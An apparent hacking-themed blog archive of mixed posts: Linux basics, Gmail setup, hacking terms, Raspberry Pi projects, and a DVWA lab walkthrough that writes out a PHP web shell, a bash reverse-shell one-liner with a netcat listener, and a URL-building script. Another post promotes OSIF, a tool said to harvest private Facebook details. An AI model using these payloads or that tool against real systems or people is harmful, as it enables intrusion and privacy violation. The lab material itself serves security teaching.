
Sunday, April 26, 2020

Linux Command Line Hackery Series: Part 1




In this concise article we will learn some basics of the Linux command line, so let's get started.

Requirements:

1. An open terminal in your Linux box. I'm using Kali Linux 2.0; if you don't have a Linux machine handy, you can use the online terminal at Webminal.

Command:  ls
Syntax:         ls [flag(s)] [directory]
Function:      ls is short for list. It lists the contents of a directory: files, sub-directories and links. With no directory argument it lists the current directory. ls has many optional flags; two of the most useful are described below.
Flags:    -a   list all entries, including hidden files, that is files whose names begin with a '.' (dot). Hidden files are easy to overlook and a favourite place to stash things you are not supposed to notice, so get into the habit of using this flag.
               -l   long listing: for each entry show the permissions, the owner, the owner's group, the file size, the modification date and the filename. We'll talk more about it in later articles.

Command:  mkdir
Syntax:         mkdir dirname
Function:      mkdir is used to create a directory (or folder) with the name that follows the command.

Now let's create a directory named myfiles in our current directory. How would you do that?

mkdir myfiles

Which command should we use to verify that the directory has been created in our current folder?

ls

This will list all the files and directories in our current folder. Do you see the myfiles directory listed?

Command:  cd
Syntax:         cd path/to/directory
Function:      cd is short for change directory. It is used to navigate between directories; in other words it does the same thing as double-clicking a folder, except that it doesn't show you the directory's contents :(. To navigate to another directory we give cd its ABSOLUTE PATH or its RELATIVE PATH. You have heard those terms before, haven't you?

Paths are of two types: relative paths and absolute paths (also called full paths). A relative path, as the name suggests, is relative to the current directory, so to navigate to a folder inside the current directory you simply type cd directory_name. But what if you have to navigate to the parent of the current directory? Easy: type cd .. (yes, two dots; you noticed the .. and . entries when you typed ls -a, didn't you?). The double dot means the directory above the current one (i.e. the parent directory) and the single dot means the current directory (i.e. the directory I'm currently in). So to navigate two directories above the current one using a relative path you type:

cd ../.. 

Here the first .. means the parent directory and the second .. after the slash (/) means the parent of that parent. It sounds confusing at first, but just read it from left to right.

An absolute path is the full path to a file or folder, starting from the root directory (/). Say I want to navigate to my home folder using an absolute path; then I'll type:

cd /home/user

where user is your username.
Now think about navigating to the myfiles folder that you created in your home directory, using its absolute path; it will be something like this:

cd /home/user/myfiles

Exercise: Create a directory named project1 inside your home directory. Inside project1 create a file named index.html and a directory named css. Then navigate into the css directory and create a style.css file inside it. Finally navigate out of the css directory back to your home directory, once using a relative path and once using an absolute path.

[Trick: to get back to your home directory quickly from anywhere, type cd ~ and press Enter, or simply cd and press Enter.]

Command:  touch
Syntax:         touch filename
Function:      touch is a nifty little command that is commonly used to create an empty file (strictly speaking it updates a file's access and modification times, creating the file if it doesn't exist, but everyone has got bad habits :P). You can create an empty file of any type with touch. If you are a bit curious about touch, read its manual page with the man touch command.

Now let's create a few files inside our myfiles directory (cd myfiles first):

touch file1 file2 file3

The above command creates three empty files in our current directory named file1, file2 and file3.
How will you verify that it has indeed created these three files in your current directory? I won't answer this time.

Command:  echo
Syntax:         echo text (for example: echo Hacker manufacturing under process)
Function:      echo is used to display a line of text. By default echo writes the line to the terminal, which is the standard output device (stdout for short). However, we can redirect the output of an echo command (or of any command) to a file using > (the greater-than symbol); the shell then writes the text into the file and nothing appears on the terminal.
Now, to echo a line of text into a file, say file1 in our myfiles directory, we type:

echo This is file1 > file1

The above command will echo the text "This is file1" to file1.

Command:  cat
Syntax:         cat filename [anotherfilename...]
Function:      cat stands for concatenate (not the puny little creature in your house). The main function of cat is to concatenate files and print them on your terminal (or, in geeky terms, to stdout). Given a single file, it simply displays that file's contents on the terminal.

Let's display the contents of file1 in the myfiles directory, which we wrote using the echo command. For that we type:

cat file1

Awesome, I can see the contents of my file on the black screen (what if your terminal's background is white?); looks like I'm becoming a hacker. If you don't see it, I suggest you give up the thought of becoming a hacker. Just kidding: you probably missed a step or two from the steps we performed above.

Now let's say we want to add another line of text to our file using the echo command. Should we use the same greater-than (>) symbol? No. To add another line (which in geeky terms is to append a line) to our file with echo we have to use >> (two greater-than symbols), like this:

echo Another line of text >> file1

now to check the contents of file1 we'll type:

cat file1

OK, we wrote two lines inside file1.
Does that mean we have to use three greater-than symbols to write a third line? Oh! I didn't think you'd be such a genius. No:

A single greater-than symbol (>) means: redirect the output of the preceding command to the file named after the > symbol. If the file exists, everything in it is thrown away (the file is truncated) and replaced with the new contents; if the file does not exist, it is created and the output of the preceding command is written to it. So if you had typed

echo Another line of text > file1

it would have overwritten the contents of file1 with "Another line of text", and the line "This is file1" would no longer be present in the file.

Two greater-than symbols (>>) mean: append (remember the geeky term?) the output of the preceding command to the end of the file named after >>. So to add yet another line of text to file1 you won't use >>>; you'll use >> again, like this:

echo Third line in file1 >> file1
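The exercise above and the > versus >> distinction, as an added example that is not part of the original post: a shell script that builds the project1 tree inside a throwaway directory created with mktemp (standing in for your home directory, so nothing real is touched), walks back out of css once with ../.. and once with an absolute path, and then shows what > and >> do to a file. The two noclobber functions show a habit worth picking up: with set -o noclobber the shell refuses to let > overwrite an existing file, and you write >| when you really mean to overwrite.

```shell
#!/bin/sh
# Added example, not from the original post. Everything happens inside a
# directory from mktemp -d that stands in for $HOME.

# Builds project1/index.html and project1/css/style.css, leaves css once with
# a relative path (../..) and once with an absolute path, and prints the files
# it created, one per line.
exercise_tree() {
    home=$(mktemp -d)
    mkdir "$home/project1" "$home/project1/css"
    touch "$home/project1/index.html" "$home/project1/css/style.css"
    (
        cd "$home/project1/css" || exit 1
        cd ../.. || exit 1                   # relative: two levels up is "home"
        # pwd -P resolves symlinks so both spellings of "home" compare equal
        [ "$(pwd -P)" = "$(cd "$home" && pwd -P)" ] || exit 1
        cd "$home/project1/css" || exit 1    # back into css ...
        cd "$home" || exit 1                 # ... and home again by absolute path
        find . -type f | sort
    )
    rm -rf "$home"
}

# Writes three lines the way the tutorial does (one > then two >>) and prints
# how many lines the file ends up with.
append_count() {
    f=$(mktemp)
    echo "This is file1"        >  "$f"      # > creates the file (or truncates it)
    echo "Another line of text" >> "$f"      # >> appends
    echo "Third line in file1"  >> "$f"
    wc -l < "$f" | tr -d ' '
    rm -f "$f"
}

# Same three lines, but the third one uses > again: the first two are gone.
truncate_count() {
    f=$(mktemp)
    echo "This is file1"        >  "$f"
    echo "Another line of text" >> "$f"
    echo "Third line in file1"  >  "$f"      # truncates before writing
    wc -l < "$f" | tr -d ' '
    rm -f "$f"
}

# With noclobber set, > refuses to overwrite an existing file, so the original
# content survives (the failed redirection is silenced here).
noclobber_keeps_original() {
    f=$(mktemp)
    echo "keep me" > "$f"
    ( set -o noclobber; echo "lost" > "$f" ) 2>/dev/null || true
    cat "$f"
    rm -f "$f"
}

# >| is the explicit "yes, overwrite" form that bypasses noclobber.
noclobber_override() {
    f=$(mktemp)
    echo "keep me" > "$f"
    ( set -o noclobber; echo "replaced" >| "$f" ) || true
    cat "$f"
    rm -f "$f"
}
```

Run it with sh and call the functions you want to see: append_count prints 3, truncate_count prints 1, and exercise_tree lists the two files created by the exercise. Putting set -o noclobber in your shell startup file is cheap insurance against a mistyped > wiping a file you cared about.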

This is it for today. But don't worry we'll learn more things soon.


Saturday, April 25, 2020

HACKING GMAIL FOR FREE CUSTOM DOMAIN EMAIL


When it comes to email providers, there's no real competitor to Google's feature set. Gmail is efficient, connects seamlessly with the rest of your Google products such as YouTube and Drive, has a major companion application called Inbox, and is overall an extremely powerful email service. However, to use it with a custom domain you need to pay for Google Apps at either $5 or $10 per month, which is a bit unnecessary for casual users. On top of that, you don't even get all of the features a personal account gets, e.g. Inbox. So here is a free way to use your Gmail account with a custom domain: hacking Gmail for a free custom domain email.

SO, HOW TO HACK GMAIL FOR A FREE CUSTOM DOMAIN EMAIL

PASSWORD: EHT

STEPS:

  • First, register with Mailgun using your Gmail address (use your Gmail only). Once you have clicked the confirmation link, log in to the Mailgun website. In the dashboard, under "Custom Domains" on the right, click "Add Domain".
  • Follow the setup instructions and set the DNS records with whoever manages your DNS (these include the TXT records Mailgun uses for SPF and DKIM, so that mail you send through it is not rejected as spoofed). Once you've done this, click the "Routes" link at the top to set up email forwarding.
  • In the Routes tab, click "Create New Route".
  • You will see a page like the one below. Enter the information as shown in the screenshot.
  • Replace the quoted email address in the screenshot with your desired address.
  • Next we set up SMTP so that Gmail can send through an actual mail server. Go to the "Domains" tab and click on your domain name.
  • On this page, click "Manage your SMTP credentials", then "New SMTP Credential" on the next page.
  • Type in the desired SMTP credentials. Pick a strong, unique password: anyone who obtains these credentials can send mail as your domain. Then go to Gmail settings and click "Add another email address you own". When the dialog opens, enter the email address you wish to send from.
  • In the next step, set the SMTP settings as follows.
  • Click the "Add Account" button and you're done.
  • Finally, make sure to set it as the default address under Gmail settings > Accounts.
That's all. Now you have free Gmail on your custom domain, with 10,000 emails per month. I hope it works for you; if you find any issues, just comment below.


Note: use a virtual machine and scan on VirusTotal before downloading any program onto your host machine, for your privacy.

What Is Cybercrime? What Are The Types Of Cybercrime? What Is Cyberlaw In India?

What is cyber crime?

Cybercrime is the use of computers and networks to perform illegal activities such as spreading viruses, online bullying, performing unauthorized electronic fund transfers, etc. Most cybercrimes are committed over the internet.
Some cybercrime is also carried out using mobile phones, via SMS and online chat applications.

TYPES OF CYBERCRIME

The following list presents the common types of cybercrime:

1-Computer Fraud-Intentional deception for personal gain through the use of a computer system.

2-Privacy Violations-Exposing personal information such as email addresses, phone numbers, account details, etc. on social media, websites and so on.

3-Identity Theft-Stealing personal information from somebody and impersonating that person.

4-Sharing copyrighted files/information-Distributing copyright-protected files such as eBooks and computer programs.

5-Electronic funds transfer-Gaining unauthorized access to bank computer networks and making illegal funds transfers.

6-Electronic money laundering-Using computers to launder money.

7-ATM fraud-Intercepting ATM card details such as account numbers and PINs. These details are then used to withdraw funds from the compromised accounts.

8-Denial of service attack-Using computers in multiple locations to attack servers with a view to shutting them down.

9-Spam-Sending unsolicited emails.
These emails usually contain advertisements.


CYBER LAW

Under The Information Technology Act, 2000
CHAPTER XI - OFFENCES - 66. Hacking with computer system.

1-Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

2-Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

(This is the wording of section 66 as originally enacted; the section was substituted by the Information Technology (Amendment) Act, 2008.)


Friday, April 24, 2020

OSIF: An Open Source Facebook Information Gathering Tool


About OSIF
   OSIF is a Facebook account information gathering tool. The project claims that sensitive information about the target (residence, date of birth, occupation, phone number and email address) can be gathered even when the target has set all of its privacy settings to "Only me".

For your privacy and security, I don't suggest using your main account!

OSIF Installation
   For Termux users, you must install python2 and git first:
pkg update && pkg upgrade
pkg install git python2


   And then, open your Terminal and enter these commands:

   If you're a Windows user, follow these steps:
  • Install Python 2.7.x from Python.org first. In the Python 2.7.x setup, choose "Add python.exe to Path".
  • Download the OSIF-master zip file.
  • Unzip it.
  • Open CMD or PowerShell in the OSIF folder you have just unzipped and enter these commands:
    pip install -r requirements.txt
    python osif.py
   Note that Python 2.7 reached end of life in January 2020 and no longer receives security fixes, so run this tool in a virtual machine or another disposable environment rather than on your main system.

Before you use OSIF, make sure that:
  • Your VPN is turned off before using this tool.
  • You do not overuse this tool.
  • If you are confused about how to use it, type help to display the help menu or watch the video below.

How to use OSIF?



Raspberry Pi Zero for "Makers": 6 PoCs & Hacks Just for Fun (1 of 3)

For several weeks now, since the state of alarm was declared, millions of citizens around the world have been confined at home because of the now-famous COVID-19. This exceptional situation has allowed us to spend more time with some of our closest relatives and to start, or pick up again, some of the projects we had left forgotten around the house.

Figure 1: Raspberry Pi Zero for "Makers": 6 PoCs & Hacks Just for Fun (1 of 3)

If that is your case and you are looking for an interesting idea to keep you entertained during this quarantine, you have come to the right place. In this series of three articles we present to you "Makers", and to those of you who would like to become one some day, six interesting projects based on the Raspberry Pi Zero, and we explain how to carry them out.

Figure 2: Arduino para Hackers: PoCs & Hacks Just for fun
from 0xWord, by Álvaro Núñez-Romero

This article follows the example of the 0xWord book for "Makers" that does the same thing: Arduino para Hackers: PoCs & Hacks Just for Fun (which also comes with a VBOOK of video sessions of the hacks). I also leave you here other references to hacks made with a Raspberry Pi that have been published on this blog.

- Raspberry Pi: how to build an environmental monitor
- Raspberry Pi: Dirtytooth for Raspberry Pi v2.0
- Raspberry Pi: a VPN for browsing on WiFi networks with captive portals
- Raspberry Pi: Pi Guardian with Latch, Telegram bots and "eyes"
- Raspberry Pi: Latch My Car
- Raspberry Pi: your own VPN service with OpenVPN, Latch and VirusTotal
- Raspberry Pi: Latch on OpenWRT

And now, on to the six projects you can build at home to keep yourself entertained and get into the "maker" world once and for all, if you have been wanting to.

1.- Pi Zero Drone: a low-cost drone with the Raspberry Pi Zero

The first project we will talk about today is building a low-cost drone, for under 200 euros, based on a GNU/Linux distribution and using the Raspberry Pi Zero as its controller board, or brain. The world of drones and light quadcopters has millions of fans; with Pi Zero Drone it is possible to bring that world a little closer to everyone who wants to get into building these fun machines.

Figure 3: Pi0Drone, a drone for 200 USD

If you are not familiar with building racing drones, or drones of any other kind, don't worry: below we explain which parts are needed for this build and how they are assembled. But if you like the world of drones and have "maker" inclinations, you can read David Meléndez Calero's book, which covers exactly these things: "Hacking con Drones: Love is in the air".


Figure 4: Hacking con Drones: "Love is in the air"

The parts needed are: chassis, ESCs (electronic speed controllers), motors, propellers, battery, the PXFmini autopilot shield (69 euros) and, of course, a Raspberry Pi Zero. The first thing is to assemble the drone; this is fairly simple and should not take you more than an hour. Start with the frame: on each arm of the chassis fix a motor with screws (they come with the chassis kit), then connect the ESCs to the motors using the coloured wires and fix them to the middle section of the arms.

Figure 5: Pi Zero Drone kit

To finish, place the Raspberry Pi Zero and the PXFmini in the centre of the chassis, connecting them to each other using the header pins and the teflon standoffs that come with the controller kit. All that is left is to connect the battery module and fix it to the underside of the chassis with the velcro straps included in the kit. A propeller also goes on each motor.

Figure 6: Pi Zero Drone assembled

Once the build is done we move on to configuring the autopilot (PXFmini + Raspberry Pi Zero). The nice thing about the Erle Robotics kit is that it includes access to their Debian images compatible with the PXFmini, so you only have to write one to a micro SD card and insert it into your Raspberry Pi Zero.

Finally, connect the JST GH cable from the power module to our autopilot assembly, so that the drone powers on when the battery is connected. All that remains is to connect the ESC of each arm to its corresponding pin on the PXFmini (PWM1 to ESC1, PWM2 to ESC2, and so on), since two of the motors spin clockwise and the other two counter-clockwise, so the order matters.


Figure 7: Building the Pi Zero Drone step by step

With the drone built and ready to fly, all that is left is to decide which device to control it with. The simplest method here is a conventional radio-control transmitter with a matching receiver (which we mount on the drone). The Pi Zero Drone project website has all the detailed information with a step-by-step guide.

2.- ZeroPhone: building a smartphone with the Raspberry Pi Zero

The second project we will talk about today is building a mini mobile phone, without doubt a rather interesting project. In this case the idea came out of a crowdfunding project, and its creators claim that the smartphone can be built for under 50 euros.

Figure 8: The ZeroPhone project website

This project is called ZeroPhone; it is open source and based on a GNU/Linux distribution. One of the biggest advantages of building the phone ourselves is that we will never have portability problems or incompatibilities with the SIM card of any telecoms operator. Although the ZeroPhone is a very simple-looking device, it can run numerous applications (only GNU/Linux sets the limits), and it comes with root access.

As for its hardware, being based on a Raspberry Pi Zero it is easy to modify and repair. Once you have bought your ZeroPhone kit or gathered all the necessary components, you only need to download the free software and follow the step-by-step instructions on the project website.

Figure 9: What the ZeroPhone looks like

Looking at its specifications, it could be called a fairly complete smartphone: as well as RGB lighting and vibration it has a micro HDMI port, a full-size USB port and a 3.5 mm jack for headphones. It also has Wi-Fi and 2G connectivity, and Bluetooth can be added.

Figure 10: ZeroPhone kit

As for the screen and keyboard, it has a 1.3-inch screen and a keypad similar to the mobile phones of the previous decade. If that setup is not comfortable for you, the screen and keypad can be replaced with a Raspberry Pi Zero touchscreen. There is a good review by Javier Pastor on the Xataka blog.

One of the things that makes this project quite attractive is the option to connect the device to a monitor and use a keyboard and mouse to control it or to modify its functions through its API. If modifying the device's software isn't enough for you, you can also fully customise the hardware: it is possible to integrate a camera of up to 8 megapixels, add new buttons or analogue or digital sensors, fit a longer-lasting battery, add different modules (GPS, radio, ...) or turn to 3D printing to design a fully customised case.


Figure 11: You can run Tor on your ZeroPhone and browse the deep web

The ZeroPhone is an ideal platform for a variety of projects: any programming language can be used on it, it allows running APIs, SSH scripts and UART consoles, and even, as seen in Figure 11, browsing with Tor.

As you can see, these are projects that require a certain amount of skill, but don't tell me that, instead of doing 1,000-piece puzzles, it isn't better to become a "maker" and play with hardware and software.

Author: Sergio Sancho Azcoitia

***********************************************************************************
- Raspberry Pi Zero for "Makers": 6 PoCs & Hacks Just for Fun (1 of 3)
***********************************************************************************


Thursday, April 23, 2020

TERMINOLOGIES OF ETHICAL HACKING

What is the terminologies in ethical hacking?

Here are a few key terms that you will hear in discussions about hackers and what they do:


1-Backdoor-A hidden way into a computer system that bypasses normal authentication, left behind by an attacker (or a developer) to get back in later.


2-Adware-Software designed to force pre-chosen advertisements to display on your system.


3-Attack-An action performed by an attacker on a system to gain unauthorized access.


4-Buffer Overflow-An attack in which the attacker feeds an application more data than one of its buffers can hold, overrunning it and overwriting adjacent memory; this can crash the program or make it execute the attacker's malicious code.


5-Denial-of-Service attack (DoS)-An attack designed to cripple the victim's system by preventing it from handling its normal traffic, usually by flooding it with bogus traffic.


6-Email Worm-A virus-laden script or mini-program sent to an unsuspecting victim through a normal-looking email message.


7-Bruteforce Attack-The simplest automated method of gaining access to a system or website: it tries username and password combinations again and again until one works, either every possible combination or a list of likely ones taken from a dictionary.


8-Root Access-The highest level of access to a computer system, giving whoever holds it complete control over the system.


9-Root Kit-A set of tools used by an intruder to expand and disguise their control of a system: stealthy software that hides the intruder's files and processes and keeps their access open.


10-Session Hijacking-Taking over an existing authenticated session between a user and a server, for example by stealing the session token or by injecting malicious packets into the live connection.


11-Phreaker-Phreakers are considered the original hackers: people who break into the telephone network illegally, typically to make free long-distance calls or to tap lines.


12-Trojan Horse-A malicious program that tricks the computer user into opening it. Trojans are designed to destroy files, alter information, steal passwords or other data.


13-Virus-A piece of code or malicious program that is capable of copying itself and has a detrimental effect such as corrupting the system or destroying data. Antivirus software is used to protect the system from viruses.


14-Worms-A self-replicating program that spreads on its own, typically across a network, without altering files on disk; it resides in active memory and duplicates itself.


15-Vulnerability-A weakness that allows an attacker to compromise the security of a computer or network system and gain unauthorized access.


16-Threat-A possible danger that can exploit an existing bug or vulnerability to compromise the security of a computer or network system. Threats are of two types: physical and non-physical.


17-Cross-site Scripting (XSS)-A type of security vulnerability found in web applications. It enables an attacker to inject client-side script into web pages viewed by other users.


18-Botnet-Also known as a zombie army: a group of computers controlled without their owners' knowledge, used to send spam or to carry out denial-of-service attacks.


19-Bot-A program that automates an action so that it can be done repeatedly, at a much higher rate and for longer than a human operator could. Example: sending HTTP, FTP or Telnet requests at a high rate, or calling a script to create objects at a high rate.


20-Firewall-A system designed to keep unwanted intruders out of a computer system or network while allowing safe communication between the systems and users inside it.


21-Spam-Unsolicited or junk email sent to a large number of recipients without their consent.


22-Zombie Drone-A hijacked computer that is being used anonymously as a soldier or drone for malicious activity, for example distributing unwanted spam emails.


23-Logic Bomb-Malicious code planted in a system that triggers a malicious action when certain conditions are met. The most common version is the time bomb, which triggers at a set date or time.


24-Shrink Wrap code-An attack that exploits holes in off-the-shelf software that is unpatched or poorly configured.


25-Malware-An umbrella term for a variety of intrusive software, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, scareware and other malicious programs.


Follow me on Instagram: anoymous_adi


Wednesday, April 22, 2020

Learning Web Pentesting With DVWA Part 5: Using File Upload To Get Shell

In today's article we will go through the File Upload vulnerability of DVWA. A file upload vulnerability is a common vulnerability in which a web app doesn't restrict the type of files that can be uploaded to the server. The result is that a potential adversary uploads a malicious file to the server and uses it to gain access to the server or to perform other malicious activities. OWASP describes the consequences of Unrestricted File Upload as: "The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored."
For successful vulnerability exploitation, we need two things:
1. An unrestricted file upload functionality.
2. Access to the uploaded file to execute the malicious code.
To perform this type of attack on DVWA click on the File Upload navigation link; you'll be presented with a file upload form like this:
Let's upload a simple text file to see what happens. I'll create a simple text file with the following command:
echo TESTUPLOAD > test.txt
and now upload it.
The server responds that our file was uploaded successfully and also gives us the path where the file was stored on the server. Now let's try to access our uploaded file on the server: we go to the address provided by the server, which is something like this:
http://localhost:9000/hackable/uploads/test.txt
and we see the text we wrote to the file. Let's upload a PHP file now, since the server is running PHP. We will upload a simple PHP file containing the phpinfo() function. The contents of the file should look something like this:
<?php
phpinfo();
?>
Save the above code in a file called info.php (you can use any name) and upload it. Now navigate to the provided URL:
http://localhost:9000/hackable/uploads/info.php
and you should see a phpinfo page like this:
The phpinfo page contains a lot of information about the web application, but what we are interested in right now is the disable_functions directive, which lists the PHP functions the server has disabled. We cannot call disabled functions from our PHP code. The function we want to use is PHP's system(), and luckily it is not listed in disable_functions (if it were, check the whole list: alternatives such as exec(), passthru(), shell_exec() or proc_open() are often left enabled). So let's go ahead and write a simple PHP web shell:
<?php
system($_GET["cmd"]);
?>
Save the above code in a file called shell.php and upload it. Visit the uploaded file and you see nothing: our simple PHP shell looks for a "cmd" GET parameter, which it passes to the system() function, which executes it. Let's check which user we are running as with the whoami command:
http://localhost:9000/hackable/uploads/shell.php?cmd=whoami
We see a response from the server giving us the user under which the web application is running.
We can use other shell commands such as ls to list directories. Let's try to get a reverse shell now. We can either use our existing web shell to spawn one, or upload a PHP reverse shell. Since we already have a web shell at our disposal, let's try that method first.
Let's take the bash one-liner reverse shell from the Pentest Monkey Reverse Shell Cheat Sheet and modify it to suit our setup, but first we need to know our IP address. Enter the following command in a terminal to get it:
ifconfig docker0
The above command gives us information about the virtual docker0 network interface (on systems without ifconfig, ip addr show docker0 gives the same information). With the IP information we modify the bash one-liner as:
bash -c 'bash -i >& /dev/tcp/172.17.0.1/9999 0>&1'
Here 172.17.0.1 is my docker0 interface IP and 9999 is the port on which I'll be listening for the reverse shell. Before putting it in the URL we need to URL-encode it, since it contains special characters (the & in particular would otherwise be read as the start of another query parameter, and the spaces and quotes would break the request). After URL-encoding the one-liner, it should look like this:
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27
Now start a listener on host with this command:
nc -lvnp 9999
and then enter the url encoded reverse shell in the cmd parameter of the url like this:
http://localhost:9000/hackable/uploads/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27
Looking back at the listener, we have a reverse shell.
Now let's get a reverse shell by uploading a PHP reverse shell. We will use Pentest Monkey's PHP reverse shell, linked in the references below. Edit the IP and port values in the PHP reverse shell to 172.17.0.1 and 9999. Set up our netcat listener like this:
nc -lvnp 9999
Then upload the reverse shell to the server and access it to execute the reverse shell.
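The two steps above (URL-encoding the one-liner and building the cmd URL), plus the check a defender would run over the uploads directory afterwards, as an added example that is not part of the original post or of DVWA. The listener address 172.17.0.1:9999 and the shell.php URL are the ones used in the text; the files created by make_demo_uploads are a constructed fixture mirroring what was uploaded in the walkthrough, plus an image with PHP hidden inside it.

```shell
#!/bin/sh
# Added example, not from the original post or DVWA: build the web-shell URL
# locally instead of pasting the payload into an online encoder, and a
# defender-side scan of an uploads directory.

# Percent-encode every character except the RFC 3986 unreserved set. Works one
# character at a time with cut, so it needs no bash-only string slicing.
# ASCII input only, which is all these payloads contain.
urlencode() {
    s=$1
    out=""
    i=1
    len=${#s}
    while [ "$i" -le "$len" ]; do
        c=$(printf '%s' "$s" | cut -c "$i")
        case $c in
            [A-Za-z0-9._~-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;   # "'c" gives c's code
        esac
        i=$((i + 1))
    done
    printf '%s\n' "$out"
}

# The bash reverse-shell one-liner from the cheat sheet, parameterised on the
# listener's IP and port.
reverse_shell_payload() {
    printf "bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'\n" "$1" "$2"
}

# Full URL for the uploaded shell.php: base URL plus the encoded command.
webshell_url() {
    printf '%s?cmd=%s\n' "$1" "$(urlencode "$2")"
}

# Defender side: list files under an uploads directory that either carry a
# server-side extension or contain a PHP open tag anywhere (an image with
# <?php inside it is exactly what an extension-only filter lets through).
suspicious_uploads() {
    dir=$1
    find "$dir" -type f | while read -r path; do
        case $path in
            *.php|*.phtml|*.phar|*.php[3457]) echo "$path"; continue ;;
        esac
        if grep -q '<?php' "$path"; then
            echo "$path"
        fi
    done
}

# Constructed fixture (not real uploads): the files from the walkthrough plus
# a fake JPEG carrying a PHP payload and a clean one. Prints the directory.
make_demo_uploads() {
    d=$(mktemp -d)
    echo "TESTUPLOAD" > "$d/test.txt"
    printf '<?php\nphpinfo();\n?>\n' > "$d/info.php"
    printf '<?php\nsystem($_GET["cmd"]);\n?>\n' > "$d/shell.php"
    printf 'JFIF-stub <?php system($_GET["c"]); ?>\n' > "$d/cat.jpg"
    printf 'JFIF-stub clean image\n' > "$d/clean.jpg"
    printf '%s\n' "$d"
}
```

Usage: webshell_url http://localhost:9000/hackable/uploads/shell.php "$(reverse_shell_payload 172.17.0.1 9999)" prints the exact URL used in the text, without the payload ever leaving your machine. On the defending side, suspicious_uploads hackable/uploads lists info.php, shell.php and the polyglot image; a correct upload handler would have rejected all three before writing them, and the web server should in any case be configured not to execute anything under the uploads directory.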
That's it for today; have fun.

References:

  1. Unrestricted File Upload: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
  2. Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  3. PHP Reverse Shell (Pentest Monkey): https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php